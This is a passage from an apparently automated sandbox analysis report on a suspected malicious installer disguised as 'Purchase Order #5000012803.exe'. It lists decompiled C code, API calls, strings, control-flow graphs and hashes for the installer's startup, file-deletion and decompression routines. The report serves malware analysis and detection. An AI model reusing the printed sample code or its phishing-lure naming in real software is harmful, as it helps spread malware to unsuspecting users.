										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}






































                      0x00403231
                      0x00403235
                      0x0040323d
                      0x0040323f
                      0x00403244
                      0x0040324f
                      0x00403256
                      0x0040325e
                      0x00403268
                      0x0040327e
                      0x0040328e
                      0x00403293
                      0x00403299
                      0x004032a0
                      0x004032b3
                      0x004032b8
                      0x004032ba
                      0x004032bc
                      0x004032c1
                      0x004032c1
                      0x004032d1
                      0x004032d7
                      0x00403340
                      0x00403340
                      0x00403342
                      0x00403344
                      0x00000000
                      0x00000000
                      0x004032dd
                      0x004032e0
                      0x004032e8
                      0x004032e8
                      0x004032eb
                      0x004032f0
                      0x004032f2
                      0x004032f2
                      0x004032f3
                      0x004032f3
                      0x004032f8
                      0x004032fb
                      0x00403330
                      0x00403335
                      0x0040333a
                      0x0040333d
                      0x0040333f
                      0x0040333f
                      0x0040333f
                      0x00000000
                      0x004032fd
                      0x004032fd
                      0x004032fe
                      0x00403301
                      0x00403309
                      0x0040330c
                      0x0040330e
                      0x0040330e
                      0x0040330e
                      0x0040330c
                      0x00403311
                      0x00403317
                      0x0040331f
                      0x00403322
                      0x00403324
                      0x00403324
                      0x00403324
                      0x00403322
                      0x00403327
                      0x0040332e
                      0x00403348
                      0x0040334b
                      0x00403354
                      0x00403359
                      0x00403359
                      0x00403364
                      0x0040336a
                      0x0040336f
                      0x00403371
                      0x00403393
                      0x00403398
                      0x0040339f
                      0x004033a6
                      0x004033aa
                      0x00403411
                      0x00403411
                      0x00403416
                      0x00403420
                      0x0040350b
                      0x00403511
                      0x0040351c
                      0x00403525
                      0x00403527
                      0x0040352c
                      0x0040352e
                      0x00403530
                      0x00403532
                      0x00403534
                      0x00403536
                      0x00403538
                      0x00403548
                      0x0040354a
                      0x0040354c
                      0x00403559
                      0x00403568
                      0x00403570
                      0x00403578
                      0x00403578
                      0x0040354c
                      0x00403538
                      0x00403534
                      0x0040357d
                      0x00403583
                      0x00403585
                      0x00403589
                      0x00403589
                      0x00403585
                      0x0040358e
                      0x00403593
                      0x00403596
                      0x00403598
                      0x00403598
                      0x004035a0
                      0x004035a0
                      0x0040342f
                      0x00403436
                      0x00403436
                      0x004033b2
                      0x00403401
                      0x00403401
                      0x0040340d
                      0x00000000
                      0x0040340d
                      0x004033bb
                      0x004033c8
                      0x004033bf
                      0x004033c5
                      0x00000000
                      0x00000000
                      0x004033c7
                      0x004033c7
                      0x004033c7
                      0x004033cc
                      0x004033ce
                      0x004033d6
                      0x00403442
                      0x00403456
                      0x00000000
                      0x00000000
                      0x0040345a
                      0x00403461
                      0x00403467
                      0x0040346d
                      0x00403475
                      0x00403475
                      0x00403483
                      0x0040348a
                      0x00403493
                      0x00403499
                      0x004034a5
                      0x004034ab
                      0x004034b5
                      0x004034c9
                      0x004034ca
                      0x004034cb
                      0x004034dc
                      0x004034e2
                      0x004034e9
                      0x004034ec
                      0x004034f2
                      0x004034f2
                      0x004034e9
                      0x004034f6
                      0x004034fc
                      0x004034fc
                      0x004034ff
                      0x00403500
                      0x00403501
                      0x00000000
                      0x00403501
                      0x004033d8
                      0x004033da
                      0x004033e5
                      0x00000000
                      0x00000000
                      0x004033ed
                      0x004033f8
                      0x004033fd
                      0x00000000
                      0x004033fd
                      0x00403379
                      0x00403385
                      0x0040338a
                      0x0040338f
                      0x00403391
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00403391
                      0x00000000
                      0x0040332e
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004032e2
                      0x004032e2
                      0x004032e2
                      0x004032e3
                      0x004032e3
                      0x00000000
                      0x004032e2
                      0x00000000

                      APIs
                      • #17.COMCTL32 ref: 00403244
                      • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                      • OleInitialize.OLE32(00000000), ref: 00403256
                        • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                        • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                        • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                      • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                        • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                      • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                      • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000), ref: 004032A6
                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000020), ref: 004032D1
                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                      • DeleteFileA.KERNELBASE(1033), ref: 00403398
                      • OleUninitialize.OLE32(00000000), ref: 00403416
                      • ExitProcess.KERNEL32 ref: 00403436
                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,00000000), ref: 00403442
                      • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,00000000,00000000), ref: 0040344E
                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                      • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                      • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                      • CopyFileA.KERNEL32 ref: 004034BF
                      • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                      • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                      • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                      • ExitProcess.KERNEL32 ref: 004035A0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\Purchase Order #5000012803.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order #5000012803.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                      • API String ID: 2278157092-530284260
                      • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                      • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 263 405419-40541a call 4055bf 255->263 264 40540c-405417 lstrcatA 255->264 256->255 256->257 257->253 260 405525-405528 257->260 261 405532-40553a call 405d7c 260->261 262 40552a-405530 260->262 261->253 271 40553c-405551 call 405578 call 40573d RemoveDirectoryA 261->271 262->253 266 40541f-405422 263->266 264->266 269 405424-40542b 266->269 270 40542d-405433 lstrcatA 266->270 269->270 272 405438-405456 lstrlenA FindFirstFileA 269->272 270->272 287 405553-405557 271->287 288 40556a-40556d call 404e23 271->288 274 405513-405517 272->274 275 40545c-405473 call 4055a3 272->275 274->257 277 405519 274->277 281 405475-405479 275->281 282 40547e-405481 275->282 277->257 281->282 284 40547b 281->284 285 405483-405488 282->285 286 405494-4054a2 call 405a85 282->286 284->282 290 4054f2-405504 FindNextFileA 285->290 291 40548a-40548c 285->291 298 4054a4-4054ac 286->298 299 4054b9-4054c8 call 40573d DeleteFileA 286->299 287->262 293 405559-405568 call 404e23 call 4057d3 287->293 288->253 290->275 296 40550a-40550d FindClose 290->296 291->286 294 40548e-405492 291->294 293->253 294->286 294->290 296->274 298->290 301 4054ae-4054b7 call 4053aa 298->301 307 4054ea-4054ed call 404e23 299->307 308 4054ca-4054ce 299->308 301->290 307->290 310 4054d0-4054e0 call 404e23 call 4057d3 308->310 311 4054e2-4054e8 308->311 310->290 311->290
                      C-Code - Quality: 94%
                      			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                      0x004053b5
                      0x004053b9
                      0x004053c2
                      0x004053c5
                      0x004053c8
                      0x004053d0
                      0x004053d2
                      0x004053d3
                      0x00000000
                      0x004053d3
                      0x004053e2
                      0x004053e2
                      0x004053e5
                      0x004053e8
                      0x004053fc
                      0x00405403
                      0x00405408
                      0x0040540a
                      0x0040541a
                      0x0040540c
                      0x00405412
                      0x00405412
                      0x0040541f
                      0x00405422
                      0x0040542d
                      0x00405433
                      0x00405438
                      0x00405448
                      0x0040544a
                      0x00405450
                      0x00405453
                      0x00405456
                      0x00405513
                      0x00405513
                      0x00405517
                      0x00405519
                      0x00405519
                      0x00405519
                      0x00405519
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040545c
                      0x0040545c
                      0x00405465
                      0x0040546b
                      0x00405470
                      0x00405473
                      0x00405475
                      0x00405479
                      0x0040547b
                      0x0040547b
                      0x00405479
                      0x0040547e
                      0x00405481
                      0x00405494
                      0x00405496
                      0x0040549b
                      0x004054a2
                      0x004054ba
                      0x004054c0
                      0x004054c6
                      0x004054c8
                      0x004054ed
                      0x004054ca
                      0x004054ca
                      0x004054ce
                      0x004054e2
                      0x004054d0
                      0x004054d3
                      0x004054d8
                      0x004054da
                      0x004054db
                      0x004054db
                      0x004054ce
                      0x004054a4
                      0x004054aa
                      0x004054ac
                      0x004054b2
                      0x004054b2
                      0x004054ac
                      0x00000000
                      0x004054a2
                      0x00405483
                      0x00405486
                      0x00405488
                      0x00000000
                      0x00000000
                      0x0040548a
                      0x0040548c
                      0x00000000
                      0x00000000
                      0x0040548e
                      0x00405492
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004054f2
                      0x004054fc
                      0x00405502
                      0x00405502
                      0x0040550d
                      0x00000000
                      0x0040550d
                      0x00405424
                      0x0040542b
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004053ea
                      0x004053ea
                      0x004053ec
                      0x0040551d
                      0x00405520
                      0x00405523
                      0x00405575
                      0x00405575
                      0x00405575
                      0x00405525
                      0x00405528
                      0x00405533
                      0x00405538
                      0x0040553a
                      0x00000000
                      0x00000000
                      0x0040553d
                      0x00405543
                      0x00405549
                      0x0040554f
                      0x00405551
                      0x00000000
                      0x0040556d
                      0x00405553
                      0x00405557
                      0x00000000
                      0x00000000
                      0x0040555c
                      0x00405561
                      0x00405562
                      0x00000000
                      0x00405563
                      0x0040552a
                      0x0040552a
                      0x00000000
                      0x0040552a
                      0x004053f2
                      0x004053f6
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004053f6

                      APIs
                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 004053C8
                      • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405412
                      • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405433
                      • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 00405439
                      • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Purchase Order #5000012803.exe" ,73BCF560), ref: 0040544A
                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                      • FindClose.KERNEL32(?), ref: 0040550D
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                      • "C:\Users\user\Desktop\Purchase Order #5000012803.exe" , xrefs: 004053B4
                      • \*.*, xrefs: 0040540C
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp Download File
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                      • String ID: "C:\Users\user\Desktop\Purchase Order #5000012803.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                      • API String ID: 2035342205-990634471
                      • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                      • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 520 40604c-406051 521 4060c2-4060e0 520->521 522 406053-406082 520->522 523 4066b8-4066cd 521->523 524 406084-406087 522->524 525 406089-40608d 522->525 529 4066e7-4066fd 523->529 530 4066cf-4066e5 523->530 526 406099-40609c 524->526 527 406095 525->527 528 40608f-406093 525->528 532 4060ba-4060bd 526->532 533 40609e-4060a7 526->533 527->526 528->526 531 406700-406707 529->531 530->531 537 406709-40670d 531->537 538 40672e-40673a 531->538 536 40628f-4062ad 532->536 534 4060a9 533->534 535 4060ac-4060b8 533->535 534->535 541 406122-406150 535->541 539 4062c5-4062d7 536->539 540 4062af-4062c3 536->540 542 406713-40672b 537->542 543 4068bc-4068c6 537->543 547 405ed0-405ed9 538->547 545 4062da-4062e4 539->545 540->545 548 406152-40616a 541->548 549 40616c-406186 541->549 542->538 546 4068d2-4068e5 543->546 552 4062e6 545->552 553 406287-40628d 545->553 551 4068ea-4068ee 546->551 554 4068e7 547->554 555 405edf 547->555 550 406189-406193 548->550 549->550 557 406199 550->557 558 40610a-406110 550->558 574 40626c-406284 552->574 575 40686e-406878 552->575 553->536 556 40622b-406235 553->556 554->551 560 405ee6-405eea 555->560 561 406026-406047 555->561 562 405f8b-405f8f 555->562 563 405ffb-405fff 555->563 570 40687a-406884 556->570 571 40623b-406404 556->571 580 406856-406860 557->580 581 4060ef-406107 557->581 572 4061c3-4061c9 558->572 573 406116-40611c 558->573 560->546 567 405ef0-405efd 560->567 561->523 565 405f95-405fae 562->565 566 40683b-406845 562->566 568 406005-406019 563->568 569 40684a-406854 563->569 576 405fb1-405fb5 565->576 566->546 567->554 579 405f03-405f49 567->579 582 40601c-406024 568->582 569->546 570->546 571->547 577 406227 572->577 578 4061cb-4061e9 572->578 573->541 573->577 574->553 575->546 576->562 584 405fb7-405fbd 576->584 577->556 585 406201-406213 578->585 586 4061eb-4061ff 578->586 587 405f71-405f73 579->587 588 405f4b-405f4f 579->588 580->546 581->558 582->561 582->563 589 405fe7-405ff9 584->589 590 405fbf-405fc6 584->590 591 406216-406220 585->591 586->591 594 405f81-405f89 587->594 595 405f75-405f7f 587->595 592 405f51-405f54 GlobalFree 588->592 593 405f5a-405f68 GlobalAlloc 588->593 589->582 596 405fd1-405fe1 GlobalAlloc 590->596 597 405fc8-405fcb GlobalFree 590->597 591->572 598 406222 591->598 592->593 593->554 599 405f6e 593->599 594->576 595->594 595->595 596->554 596->589 597->596 601 406862-40686c 598->601 602 4061a8-4061c0 598->602 599->587 601->546 602->572
                      C-Code - Quality: 98%
                      			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
